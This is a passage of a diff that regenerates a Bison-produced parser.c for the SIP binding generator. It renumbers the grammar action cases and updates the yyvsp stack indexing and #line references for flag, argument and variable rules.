(yyvsp[0].flag); + (yyval.optflags).nrFlags = 1; + } ++#line 7296 "../parser.c" + break; + +- case 501: +-#line 3947 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 502: /* flaglist: flaglist ',' flag */ ++#line 3973 "parser.y" ++ { + /* Check there is room. 
*/ + +- if ((yyvsp[(1) - (3)].optflags).nrFlags == MAX_NR_FLAGS) ++ if ((yyvsp[-2].optflags).nrFlags == MAX_NR_FLAGS) + yyerror("Too many optional flags"); + +- (yyval.optflags) = (yyvsp[(1) - (3)].optflags); ++ (yyval.optflags) = (yyvsp[-2].optflags); + +- (yyval.optflags).flags[(yyval.optflags).nrFlags++] = (yyvsp[(3) - (3)].flag); ++ (yyval.optflags).flags[(yyval.optflags).nrFlags++] = (yyvsp[0].flag); + } ++#line 7311 "../parser.c" + break; + +- case 502: +-#line 3959 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 503: /* flag: TK_NAME_VALUE */ ++#line 3985 "parser.y" ++ { + (yyval.flag).ftype = bool_flag; +- (yyval.flag).fname = (yyvsp[(1) - (1)].text); ++ (yyval.flag).fname = (yyvsp[0].text); + } ++#line 7320 "../parser.c" + break; + +- case 503: +-#line 3963 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.flag) = (yyvsp[(3) - (3)].flag); +- (yyval.flag).fname = (yyvsp[(1) - (3)].text); ++ case 504: /* flag: TK_NAME_VALUE '=' flagvalue */ ++#line 3989 "parser.y" ++ { ++ (yyval.flag) = (yyvsp[0].flag); ++ (yyval.flag).fname = (yyvsp[-2].text); + } ++#line 7329 "../parser.c" + break; + +- case 504: +-#line 3969 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.flag).ftype = (strchr((yyvsp[(1) - (1)].text), '.') != NULL) ? dotted_name_flag : name_flag; +- (yyval.flag).fvalue.sval = (yyvsp[(1) - (1)].text); ++ case 505: /* flagvalue: dottedname */ ++#line 3995 "parser.y" ++ { ++ (yyval.flag).ftype = (strchr((yyvsp[0].text), '.') != NULL) ? dotted_name_flag : name_flag; ++ (yyval.flag).fvalue.sval = (yyvsp[0].text); + } ++#line 7338 "../parser.c" + break; + +- case 505: +-#line 3973 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 506: /* flagvalue: TK_NAME_VALUE ':' optnumber '-' optnumber */ ++#line 3999 "parser.y" ++ { + apiVersionRangeDef *avd; + int from, to; + + (yyval.flag).ftype = api_range_flag; + + /* Check that the API is known. 
*/ +- if ((avd = findAPI(currentSpec, (yyvsp[(1) - (5)].text))) == NULL) ++ if ((avd = findAPI(currentSpec, (yyvsp[-4].text))) == NULL) + yyerror("unknown API name in API annotation"); + + if (inMainModule()) + setIsUsedName(avd->api_name); + + /* Unbounded values are represented by 0. */ +- if ((from = (yyvsp[(3) - (5)].number)) < 0) ++ if ((from = (yyvsp[-2].number)) < 0) + from = 0; + +- if ((to = (yyvsp[(5) - (5)].number)) < 0) ++ if ((to = (yyvsp[0].number)) < 0) + to = 0; + + (yyval.flag).fvalue.aval = convertAPIRange(currentModule, avd->api_name, + from, to); + } ++#line 7366 "../parser.c" + break; + +- case 506: +-#line 3996 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 507: /* flagvalue: TK_STRING_VALUE */ ++#line 4022 "parser.y" ++ { + (yyval.flag).ftype = string_flag; +- (yyval.flag).fvalue.sval = convertFeaturedString((yyvsp[(1) - (1)].text)); ++ (yyval.flag).fvalue.sval = convertFeaturedString((yyvsp[0].text)); + } ++#line 7375 "../parser.c" + break; + +- case 507: +-#line 4000 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 508: /* flagvalue: TK_NUMBER_VALUE */ ++#line 4026 "parser.y" ++ { + (yyval.flag).ftype = integer_flag; +- (yyval.flag).fvalue.ival = (yyvsp[(1) - (1)].number); ++ (yyval.flag).fvalue.ival = (yyvsp[0].number); + } ++#line 7384 "../parser.c" + break; + +- case 508: +-#line 4006 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 509: /* virtualcallcode: %empty */ ++#line 4032 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7392 "../parser.c" + break; + +- case 509: +-#line 4009 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 510: /* virtualcallcode: TK_VIRTUALCALLCODE codeblock */ ++#line 4035 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7400 "../parser.c" + break; + +- case 510: +-#line 4014 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 511: /* methodcode: %empty */ ++#line 4040 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7408 "../parser.c" 
+ break; + +- case 511: +-#line 4017 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 512: /* methodcode: TK_METHODCODE codeblock */ ++#line 4043 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7416 "../parser.c" + break; + +- case 512: +-#line 4022 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 513: /* premethodcode: %empty */ ++#line 4048 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7424 "../parser.c" + break; + +- case 513: +-#line 4025 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 514: /* premethodcode: TK_PREMETHODCODE codeblock */ ++#line 4051 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7432 "../parser.c" + break; + +- case 514: +-#line 4030 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 515: /* virtualcatchercode: %empty */ ++#line 4056 "parser.y" ++ { + (yyval.codeb) = NULL; + } ++#line 7440 "../parser.c" + break; + +- case 515: +-#line 4033 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.codeb) = (yyvsp[(2) - (2)].codeb); ++ case 516: /* virtualcatchercode: TK_VIRTUALCATCHERCODE codeblock */ ++#line 4059 "parser.y" ++ { ++ (yyval.codeb) = (yyvsp[0].codeb); + } ++#line 7448 "../parser.c" + break; + +- case 516: +-#line 4038 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 517: /* arglist: rawarglist */ ++#line 4064 "parser.y" ++ { + int a, nrrxcon, nrrxdis, nrslotcon, nrslotdis, nrarray, nrarraysize; + + nrrxcon = nrrxdis = nrslotcon = nrslotdis = nrarray = nrarraysize = 0; + +- for (a = 0; a < (yyvsp[(1) - (1)].signature).nrArgs; ++a) ++ for (a = 0; a < (yyvsp[0].signature).nrArgs; ++a) + { +- argDef *ad = &(yyvsp[(1) - (1)].signature).args[a]; ++ argDef *ad = &(yyvsp[0].signature).args[a]; + + switch (ad -> atype) + { +@@ -7497,226 +7497,243 @@ yyreduce: + if (nrarray != nrarraysize || nrarray > 1) + yyerror("/Array/ and /ArraySize/ must both be given and at most once"); + +- (yyval.signature) = 
(yyvsp[(1) - (1)].signature); ++ (yyval.signature) = (yyvsp[0].signature); + } ++#line 7503 "../parser.c" + break; + +- case 517: +-#line 4090 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 518: /* rawarglist: %empty */ ++#line 4116 "parser.y" ++ { + /* No arguments. */ + + (yyval.signature).nrArgs = 0; + } ++#line 7513 "../parser.c" + break; + +- case 518: +-#line 4095 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 519: /* rawarglist: argvalue */ ++#line 4121 "parser.y" ++ { + /* The single or first argument. */ + +- (yyval.signature).args[0] = (yyvsp[(1) - (1)].memArg); ++ (yyval.signature).args[0] = (yyvsp[0].memArg); + (yyval.signature).nrArgs = 1; + } ++#line 7524 "../parser.c" + break; + +- case 519: +-#line 4101 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 520: /* rawarglist: rawarglist ',' argvalue */ ++#line 4127 "parser.y" ++ { + /* Check that it wasn't ...(,arg...). */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == 0) ++ if ((yyvsp[-2].signature).nrArgs == 0) + yyerror("First argument of the list is missing"); + + /* + * If this argument has no default value, then the + * previous one mustn't either. + */ +- if ((yyvsp[(3) - (3)].memArg).defval == NULL && (yyvsp[(1) - (3)].signature).args[(yyvsp[(1) - (3)].signature).nrArgs - 1].defval != NULL) ++ if ((yyvsp[0].memArg).defval == NULL && (yyvsp[-2].signature).args[(yyvsp[-2].signature).nrArgs - 1].defval != NULL) + yyerror("Compulsory argument given after optional argument"); + + /* Check there is room. 
*/ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.signature) = (yyvsp[(1) - (3)].signature); ++ (yyval.signature) = (yyvsp[-2].signature); + +- (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[(3) - (3)].memArg); ++ (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[0].memArg); + (yyval.signature).nrArgs++; + } ++#line 7550 "../parser.c" + break; + +- case 520: +-#line 4124 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 521: /* argvalue: TK_SIPSIGNAL optname optflags optassign */ ++#line 4150 "parser.y" ++ { + deprecated("SIP_SIGNAL is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_SIGNAL has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_SIGNAL has no annotations"); + + (yyval.memArg).atype = signal_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = (yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7567 "../parser.c" + break; + +- case 521: +-#line 4136 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 522: /* argvalue: TK_SIPSLOT optname optflags optassign */ ++#line 4162 "parser.y" ++ { + deprecated("SIP_SLOT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_SLOT has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_SLOT has no annotations"); + + (yyval.memArg).atype = slot_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = 
(yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7584 "../parser.c" + break; + +- case 522: +-#line 4148 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 523: /* argvalue: TK_SIPANYSLOT optname optflags optassign */ ++#line 4174 "parser.y" ++ { + deprecated("SIP_ANYSLOT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (4)].optflags), "SIP_ANYSLOT has no annotations"); ++ checkNoAnnos(&(yyvsp[-1].optflags), "SIP_ANYSLOT has no annotations"); + + (yyval.memArg).atype = anyslot_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (4)].text)); +- (yyval.memArg).defval = (yyvsp[(4) - (4)].valp); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-2].text)); ++ (yyval.memArg).defval = (yyvsp[0].valp); + + currentSpec -> sigslots = TRUE; + } ++#line 7601 "../parser.c" + break; + +- case 523: +-#line 4160 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 524: /* argvalue: TK_SIPRXCON optname optflags */ ++#line 4186 "parser.y" ++ { + const char *annos[] = { + "SingleShot", + NULL + }; + + deprecated("SIP_RXOBJ_CON is deprecated\n"); +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + + (yyval.memArg).atype = rxcon_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "SingleShot", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "SingleShot", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_SINGLE_SHOT; + + currentSpec -> sigslots = TRUE; + } ++#line 7625 "../parser.c" + break; + +- case 524: +-#line 4179 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 525: /* argvalue: TK_SIPRXDIS optname optflags */ ++#line 4205 "parser.y" ++ { + deprecated("SIP_RXOBJ_DIS is deprecated\n"); +- 
checkNoAnnos(&(yyvsp[(3) - (3)].optflags), "SIP_RXOBJ_DIS has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_RXOBJ_DIS has no annotations"); + + (yyval.memArg).atype = rxdis_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + + currentSpec -> sigslots = TRUE; + } ++#line 7641 "../parser.c" + break; + +- case 525: +-#line 4190 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 526: /* argvalue: TK_SIPSLOTCON '(' arglist ')' optname optflags */ ++#line 4216 "parser.y" ++ { + deprecated("SIP_SLOT_CON is deprecated\n"); +- checkNoAnnos(&(yyvsp[(6) - (6)].optflags), "SIP_SLOT_CON has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_SLOT_CON has no annotations"); + + (yyval.memArg).atype = slotcon_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(5) - (6)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- memset(&(yyvsp[(3) - (6)].signature).result, 0, sizeof (argDef)); +- (yyvsp[(3) - (6)].signature).result.atype = void_type; ++ memset(&(yyvsp[-3].signature).result, 0, sizeof (argDef)); ++ (yyvsp[-3].signature).result.atype = void_type; + + (yyval.memArg).u.sa = sipMalloc(sizeof (signatureDef)); +- *(yyval.memArg).u.sa = (yyvsp[(3) - (6)].signature); ++ *(yyval.memArg).u.sa = (yyvsp[-3].signature); + + currentSpec -> sigslots = TRUE; + } ++#line 7663 "../parser.c" + break; + +- case 526: +-#line 4207 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 527: /* argvalue: TK_SIPSLOTDIS '(' arglist ')' optname optflags */ ++#line 4233 "parser.y" ++ { + deprecated("SIP_SLOT_DIS is deprecated\n"); +- checkNoAnnos(&(yyvsp[(6) - (6)].optflags), "SIP_SLOT_DIS has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_SLOT_DIS has no annotations"); + + (yyval.memArg).atype = 
slotdis_type; + (yyval.memArg).argflags = ARG_IS_CONST; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(5) - (6)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- memset(&(yyvsp[(3) - (6)].signature).result, 0, sizeof (argDef)); +- (yyvsp[(3) - (6)].signature).result.atype = void_type; ++ memset(&(yyvsp[-3].signature).result, 0, sizeof (argDef)); ++ (yyvsp[-3].signature).result.atype = void_type; + + (yyval.memArg).u.sa = sipMalloc(sizeof (signatureDef)); +- *(yyval.memArg).u.sa = (yyvsp[(3) - (6)].signature); ++ *(yyval.memArg).u.sa = (yyvsp[-3].signature); + + currentSpec -> sigslots = TRUE; + } ++#line 7685 "../parser.c" + break; + +- case 527: +-#line 4224 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 528: /* argvalue: TK_QOBJECT optname optflags */ ++#line 4250 "parser.y" ++ { + deprecated("SIP_QOBJECT is deprecated\n"); +- checkNoAnnos(&(yyvsp[(3) - (3)].optflags), "SIP_QOBJECT has no annotations"); ++ checkNoAnnos(&(yyvsp[0].optflags), "SIP_QOBJECT has no annotations"); + + (yyval.memArg).atype = qobject_type; + (yyval.memArg).argflags = 0; + (yyval.memArg).nrderefs = 0; +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + } ++#line 7699 "../parser.c" + break; + +- case 528: +-#line 4233 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(1) - (2)].memArg); +- (yyval.memArg).defval = (yyvsp[(2) - (2)].valp); ++ case 529: /* argvalue: argtype optassign */ ++#line 4259 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-1].memArg); ++ (yyval.memArg).defval = (yyvsp[0].valp); + } ++#line 7708 "../parser.c" + break; + +- case 529: +-#line 4240 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsSignal = TRUE;} ++ case 530: /* $@19: %empty */ ++#line 4266 "parser.y" ++ {currentIsSignal = TRUE;} ++#line 7714 "../parser.c" + break; + +- case 531: +-#line 4241 
"sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsSlot = TRUE;} ++ case 532: /* $@20: %empty */ ++#line 4267 "parser.y" ++ {currentIsSlot = TRUE;} ++#line 7720 "../parser.c" + break; + +- case 534: +-#line 4246 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsStatic = TRUE;} ++ case 535: /* $@21: %empty */ ++#line 4272 "parser.y" ++ {currentIsStatic = TRUE;} ++#line 7726 "../parser.c" + break; + +- case 539: +-#line 4256 "sip-4.19.23/sipgen/metasrc/parser.y" +- {currentIsVirt = TRUE;} ++ case 540: /* $@22: %empty */ ++#line 4282 "parser.y" ++ {currentIsVirt = TRUE;} ++#line 7732 "../parser.c" + break; + +- case 542: +-#line 4260 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 543: /* variable: cpptype TK_NAME_VALUE optflags variable_body ';' optaccesscode optgetcode optsetcode */ ++#line 4286 "parser.y" ++ { + if (notSkipping()) + { + const char *annos[] = { +@@ -7730,99 +7747,105 @@ yyreduce: + NULL + }; + +- checkAnnos(&(yyvsp[(3) - (8)].optflags), annos); ++ checkAnnos(&(yyvsp[-5].optflags), annos); + +- if ((yyvsp[(6) - (8)].codeb) != NULL) ++ if ((yyvsp[-2].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).access_code != NULL) ++ if ((yyvsp[-4].variable).access_code != NULL) + yyerror("%AccessCode already defined"); + +- (yyvsp[(4) - (8)].variable).access_code = (yyvsp[(6) - (8)].codeb); ++ (yyvsp[-4].variable).access_code = (yyvsp[-2].codeb); + + deprecated("%AccessCode should be used as a sub-directive"); + } + +- if ((yyvsp[(7) - (8)].codeb) != NULL) ++ if ((yyvsp[-1].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).get_code != NULL) ++ if ((yyvsp[-4].variable).get_code != NULL) + yyerror("%GetCode already defined"); + +- (yyvsp[(4) - (8)].variable).get_code = (yyvsp[(7) - (8)].codeb); ++ (yyvsp[-4].variable).get_code = (yyvsp[-1].codeb); + + deprecated("%GetCode should be used as a sub-directive"); + } + +- if ((yyvsp[(8) - (8)].codeb) != NULL) ++ if ((yyvsp[0].codeb) != NULL) + { +- if ((yyvsp[(4) - (8)].variable).set_code != NULL) ++ if 
((yyvsp[-4].variable).set_code != NULL) + yyerror("%SetCode already defined"); + +- (yyvsp[(4) - (8)].variable).set_code = (yyvsp[(8) - (8)].codeb); ++ (yyvsp[-4].variable).set_code = (yyvsp[0].codeb); + + deprecated("%SetCode should be used as a sub-directive"); + } + +- newVar(currentSpec, currentModule, (yyvsp[(2) - (8)].text), currentIsStatic, &(yyvsp[(1) - (8)].memArg), +- &(yyvsp[(3) - (8)].optflags), (yyvsp[(4) - (8)].variable).access_code, (yyvsp[(4) - (8)].variable).get_code, (yyvsp[(4) - (8)].variable).set_code, ++ newVar(currentSpec, currentModule, (yyvsp[-6].text), currentIsStatic, &(yyvsp[-7].memArg), ++ &(yyvsp[-5].optflags), (yyvsp[-4].variable).access_code, (yyvsp[-4].variable).get_code, (yyvsp[-4].variable).set_code, + sectionFlags); + } + + currentIsStatic = FALSE; + } ++#line 7790 "../parser.c" + break; + +- case 543: +-#line 4315 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 544: /* variable_body: %empty */ ++#line 4341 "parser.y" ++ { + (yyval.variable).token = 0; + (yyval.variable).access_code = NULL; + (yyval.variable).get_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7801 "../parser.c" + break; + +- case 544: +-#line 4321 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.variable) = (yyvsp[(2) - (3)].variable); ++ case 545: /* variable_body: '{' variable_body_directives '}' */ ++#line 4347 "parser.y" ++ { ++ (yyval.variable) = (yyvsp[-1].variable); + } ++#line 7809 "../parser.c" + break; + +- case 546: +-#line 4327 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.variable) = (yyvsp[(1) - (2)].variable); ++ case 547: /* variable_body_directives: variable_body_directives variable_body_directive */ ++#line 4353 "parser.y" ++ { ++ (yyval.variable) = (yyvsp[-1].variable); + +- switch ((yyvsp[(2) - (2)].variable).token) ++ switch ((yyvsp[0].variable).token) + { +- case TK_ACCESSCODE: (yyval.variable).access_code = (yyvsp[(2) - (2)].variable).access_code; break; +- case TK_GETCODE: (yyval.variable).get_code = (yyvsp[(2) - 
(2)].variable).get_code; break; +- case TK_SETCODE: (yyval.variable).set_code = (yyvsp[(2) - (2)].variable).set_code; break; ++ case TK_ACCESSCODE: (yyval.variable).access_code = (yyvsp[0].variable).access_code; break; ++ case TK_GETCODE: (yyval.variable).get_code = (yyvsp[0].variable).get_code; break; ++ case TK_SETCODE: (yyval.variable).set_code = (yyvsp[0].variable).set_code; break; + } + } ++#line 7824 "../parser.c" + break; + +- case 547: +-#line 4339 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 548: /* variable_body_directive: ifstart */ ++#line 4365 "parser.y" ++ { + (yyval.variable).token = TK_IF; + } ++#line 7832 "../parser.c" + break; + +- case 548: +-#line 4342 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 549: /* variable_body_directive: ifend */ ++#line 4368 "parser.y" ++ { + (yyval.variable).token = TK_END; + } ++#line 7840 "../parser.c" + break; + +- case 549: +-#line 4345 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 550: /* variable_body_directive: TK_ACCESSCODE codeblock */ ++#line 4371 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_ACCESSCODE; +- (yyval.variable).access_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).access_code = (yyvsp[0].codeb); + } + else + { +@@ -7833,15 +7856,16 @@ yyreduce: + (yyval.variable).get_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7860 "../parser.c" + break; + +- case 550: +-#line 4360 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 551: /* variable_body_directive: TK_GETCODE codeblock */ ++#line 4386 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_GETCODE; +- (yyval.variable).get_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).get_code = (yyvsp[0].codeb); + } + else + { +@@ -7852,15 +7876,16 @@ yyreduce: + (yyval.variable).access_code = NULL; + (yyval.variable).set_code = NULL; + } ++#line 7880 "../parser.c" + break; + +- case 551: +-#line 4375 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 552: /* 
variable_body_directive: TK_SETCODE codeblock */ ++#line 4401 "parser.y" ++ { + if (notSkipping()) + { + (yyval.variable).token = TK_SETCODE; +- (yyval.variable).set_code = (yyvsp[(2) - (2)].codeb); ++ (yyval.variable).set_code = (yyvsp[0].codeb); + } + else + { +@@ -7871,36 +7896,39 @@ yyreduce: + (yyval.variable).access_code = NULL; + (yyval.variable).get_code = NULL; + } ++#line 7900 "../parser.c" + break; + +- case 552: +-#line 4392 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(2) - (4)].memArg); +- add_derefs(&(yyval.memArg), &(yyvsp[(3) - (4)].memArg)); +- (yyval.memArg).argflags |= ARG_IS_CONST | (yyvsp[(4) - (4)].number); ++ case 553: /* cpptype: TK_CONST basetype deref optref */ ++#line 4418 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ add_derefs(&(yyval.memArg), &(yyvsp[-1].memArg)); ++ (yyval.memArg).argflags |= ARG_IS_CONST | (yyvsp[0].number); + } ++#line 7910 "../parser.c" + break; + +- case 553: +-#line 4397 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.memArg) = (yyvsp[(1) - (3)].memArg); +- add_derefs(&(yyval.memArg), &(yyvsp[(2) - (3)].memArg)); +- (yyval.memArg).argflags |= (yyvsp[(3) - (3)].number); ++ case 554: /* cpptype: basetype deref optref */ ++#line 4423 "parser.y" ++ { ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ add_derefs(&(yyval.memArg), &(yyvsp[-1].memArg)); ++ (yyval.memArg).argflags |= (yyvsp[0].number); + + /* PyObject * is a synonym for SIP_PYOBJECT. 
*/ +- if ((yyvsp[(1) - (3)].memArg).atype == defined_type && strcmp((yyvsp[(1) - (3)].memArg).u.snd->name, "PyObject") == 0 && (yyvsp[(1) - (3)].memArg).u.snd->next == NULL && (yyvsp[(2) - (3)].memArg).nrderefs == 1 && (yyvsp[(3) - (3)].number) == 0) ++ if ((yyvsp[-2].memArg).atype == defined_type && strcmp((yyvsp[-2].memArg).u.snd->name, "PyObject") == 0 && (yyvsp[-2].memArg).u.snd->next == NULL && (yyvsp[-1].memArg).nrderefs == 1 && (yyvsp[0].number) == 0) + { + (yyval.memArg).atype = pyobject_type; + (yyval.memArg).nrderefs = 0; + } + } ++#line 7927 "../parser.c" + break; + +- case 554: +-#line 4411 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 555: /* argtype: cpptype optname optflags */ ++#line 4437 "parser.y" ++ { + const char *annos[] = { + "AllowNone", + "Array", +@@ -7930,54 +7958,54 @@ yyreduce: + + optFlag *of; + +- checkAnnos(&(yyvsp[(3) - (3)].optflags), annos); ++ checkAnnos(&(yyvsp[0].optflags), annos); + +- (yyval.memArg) = (yyvsp[(1) - (3)].memArg); +- (yyval.memArg).name = cacheName(currentSpec, (yyvsp[(2) - (3)].text)); ++ (yyval.memArg) = (yyvsp[-2].memArg); ++ (yyval.memArg).name = cacheName(currentSpec, (yyvsp[-1].text)); + +- handleKeepReference(&(yyvsp[(3) - (3)].optflags), &(yyval.memArg), currentModule); ++ handleKeepReference(&(yyvsp[0].optflags), &(yyval.memArg), currentModule); + +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "ScopesStripped", opt_integer_flag)) != NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "ScopesStripped", opt_integer_flag)) != NULL) + if (((yyval.memArg).scopes_stripped = of->fvalue.ival) <= 0) + yyerror("/ScopesStripped/ must be greater than 0"); + +- if (getAllowNone(&(yyvsp[(3) - (3)].optflags))) ++ if (getAllowNone(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_ALLOW_NONE; + +- if (getDisallowNone(&(yyvsp[(3) - (3)].optflags))) ++ if (getDisallowNone(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_DISALLOW_NONE; + +- if (getOptFlag(&(yyvsp[(3) - 
(3)].optflags),"GetWrapper",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"GetWrapper",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_GET_WRAPPER; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"Array",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Array",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_ARRAY; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"ArraySize",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"ArraySize",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_ARRAY_SIZE; + +- if (getTransfer(&(yyvsp[(3) - (3)].optflags))) ++ if (getTransfer(&(yyvsp[0].optflags))) + (yyval.memArg).argflags |= ARG_XFERRED; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"TransferThis",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"TransferThis",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_THIS_XFERRED; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"TransferBack",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"TransferBack",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_XFERRED_BACK; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"In",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"In",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_IN; + +- if 